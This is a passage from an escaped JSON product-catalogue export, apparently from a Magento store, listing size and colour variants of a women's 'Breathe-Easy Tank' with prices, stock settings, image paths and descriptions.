Machine wash\\/dry.<br \\/>&bull; Cocona&reg; fabric.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"34\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"breathe-easy-tank-xs-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt09-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt09-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt09-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/t\\/wt09-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt09-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Yellow\"},\"1753\":{\"sku\":\"WT09-S-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Breathe-Easy Tank-S-Purple\",\"description\":\"<p>The Breathe Easy Tank is so soft, lightweight, and comfortable, you won\'t even know it\'s there -- until its high-tech Cocona&reg; fabric starts wicking sweat away from your body to help you stay dry and focused. Layer it over your favorite sports bra and get moving.<\\/p>\\n<p>&bull; Machine wash\\/dry.<br \\/>&bull; Cocona&reg; fabric.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"34\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"breathe-easy-tank-s-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt09-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt09-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt09-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/t\\/wt09-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt09-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Purple\"},\"1754\":{\"sku\":\"WT09-S-White\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Breathe-Easy Tank-S-White\",\"description\":\"<p>The Breathe Easy Tank is so soft, lightweight, and comfortable, you won\'t even know it\'s there -- until its high-tech Cocona&reg; fabric starts wicking sweat away from your body to help you stay dry and focused. Layer it over your favorite sports bra and get moving.<\\/p>\\n<p>&bull; Machine wash\\/dry.<br \\/>&bull; Cocona&reg; fabric.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"34\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"breathe-easy-tank-s-white\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt09-white_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt09-white_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt09-white_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=White\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/t\\/wt09-white_back.jpg\",\"image\":\"\\/w\\/t\\/wt09-white_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt09-white_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/t\\/wt09-white_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"White\"},\"1755\":{\"sku\":\"WT09-S-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Breathe-Easy Tank-S-Yellow\",\"description\":\"<p>The Breathe Easy Tank is so soft, lightweight, and comfortable, you won\'t even know it\'s there -- until its high-tech Cocona&reg; fabric starts wicking sweat away from your body to help you stay dry and focused. Layer it over your favorite sports bra and get moving.<\\/p>\\n<p>&bull; Machine wash\\/dry.<br \\/>&bull; Cocona&reg; fabric.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"34\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"breathe-easy-tank-s-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt09-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt09-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt09-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/t\\/wt09-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt09-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Yellow\"},\"1756\":{\"sku\":\"WT09-M-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Breathe-Easy Tank-M-Purple\",\"description\":\"<p>The Breathe Easy Tank is so soft, lightweight, and comfortable, you won\'t even know it\'s there -- until its high-tech Cocona&reg; fabric starts wicking sweat away from your body to help you stay dry and focused. Layer it over your favorite sports bra and get moving.<\\/p>\\n<p>&bull; Machine wash\\/dry.<br \\/>&bull; Cocona&reg; fabric.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"34\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"breathe-easy-tank-m-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt09-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt09-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt09-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/t\\/wt09-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt09-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Purple\"},\"1757\":{\"sku\":\"WT09-M-White\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Breathe-Easy Tank-M-White\",\"description\":\"<p>The Breathe Easy Tank is so soft, lightweight, and comfortable, you won\'t even know it\'s there -- until its high-tech Cocona&reg; fabric starts wicking sweat away from your body to help you stay dry and focused. Layer it over your favorite sports bra and get moving.<\\/p>\\n<p>&bull; Machine wash\\/dry.<br \\/>&bull; Cocona&reg; fabric.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"34\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"breathe-easy-tank-m-white\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt09-white_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt09-white_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt09-white_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=White\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/t\\/wt09-white_back.jpg\",\"image\":\"\\/w\\/t\\/wt09-white_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt09-white_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/t\\/wt09-white_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"White\"},\"1758\":{\"sku\":\"WT09-M-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Breathe-Easy Tank-M-Yellow\",\"description\":\"<p>The Breathe Easy Tank is so soft, lightweight, and comfortable, you won\'t even know it\'s there -- until its high-tech Cocona&reg; fabric starts wicking sweat away from your body to help you stay dry and focused. Layer it over your favorite sports bra and get moving.<\\/p>\\n<p>&bull; Machine wash\\/dry.<br \\/>&bull; Cocona&reg; fabric.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"34\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"breathe-easy-tank-m-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt09-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt09-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt09-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/t\\/wt09-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt09-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Yellow\"},\"1759\":{\"sku\":\"WT09-L-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Breathe-Easy Tank-L-Purple\",\"description\":\"<p>The Breathe Easy Tank is so soft, lightweight, and comfortable, you won\'t even know it\'s there -- until its high-tech Cocona&reg; fabric starts wicking sweat away from your body to help you stay dry and focused. Layer it over your favorite sports bra and get moving.<\\/p>\\n<p>&bull; Machine wash\\/dry.<br \\/>&bull; Cocona&reg; fabric.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"34\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"breathe-easy-tank-l-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt09-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt09-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt09-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/t\\/wt09-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt09-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Purple\"},\"1760\":{\"sku\":\"WT09-L-White\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Breathe-Easy Tank-L-White\",\"description\":\"<p>The Breathe Easy Tank is so soft, lightweight, and comfortable, you won\'t even know it\'s there -- until its high-tech Cocona&reg; fabric starts wicking sweat away from your body to help you stay dry and focused. Layer it over your favorite sports bra and get moving.<\\/p>\\n<p>&bull; Machine wash\\/dry.<br \\/>&bull; Cocona&reg; fabric.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"34\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"breathe-easy-tank-l-white\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt09-white_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt09-white_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt09-white_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=White\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/t\\/wt09-white_back.jpg\",\"image\":\"\\/w\\/t\\/wt09-white_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt09-white_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/t\\/wt09-white_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"White\"},\"1761\":{\"sku\":\"WT09-L-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Erin Recommends,Default 